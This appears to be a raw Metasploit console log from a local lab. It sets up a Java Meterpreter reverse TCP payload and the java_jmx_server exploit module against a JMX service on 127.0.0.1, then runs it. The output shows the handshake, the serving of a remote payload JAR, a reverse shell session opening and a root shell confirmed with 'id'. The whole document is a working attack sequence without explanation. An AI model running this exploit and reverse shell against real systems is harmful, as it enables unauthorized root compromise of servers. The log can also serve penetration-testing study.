msf > use java/meterpreter/reverse_tcp msf payload(java/meterpreter/reverse_tcp) > set LHOST 127.0.0.1 LHOST => 127.0.0.1 msf payload(java/meterpreter/reverse_tcp) > set LPORT 4444 LPORT => 4444 msf payload(java/meterpreter/reverse_tcp) > use exploit/multi/misc/java_jmx_server msf exploit(multi/misc/java_jmx_server) > set RHOST 127.0.0.1 RHOST => 127.0.0.1 msf exploit(multi/misc/java_jmx_server) > set RPORT 18983 RPORT => 18983 msf exploit(multi/misc/java_jmx_server) > run
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? [*] Started reverse TCP handler on 127.0.0.1:4444 [*] 127.0.0.1:18983 - Using URL: http://0.0.0.0:8080/ka4B2HQsM [*] 127.0.0.1:18983 - Local IP: http://172.16.65.171:8080/ka4B2HQsM [*] 127.0.0.1:18983 - Sending RMI Header... [*] 127.0.0.1:18983 - Discovering the JMXRMI endpoint... [+] 127.0.0.1:18983 - JMXRMI endpoint on 127.0.1.1:18983 [*] 127.0.0.1:18983 - Proceeding with handshake... [+] 127.0.0.1:18983 - Handshake with JMX MBean server on 127.0.1.1:18983 [*] 127.0.0.1:18983 - Loading payload... [*] 127.0.0.1:18983 - Replied to request for mlet [*] 127.0.0.1:18983 - Replied to request for payload JAR [*] 127.0.0.1:18983 - Executing payload... [*] 127.0.0.1:18983 - Replied to request for payload JAR [*] Sending stage (53837 bytes) to 127.0.0.1 [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:40740) at 2019-12-06 14:20:04 +0800
meterpreter > shell Process 1 created. Channel 1 created. id uid=0(root) gid=0(root) groups=0(root)
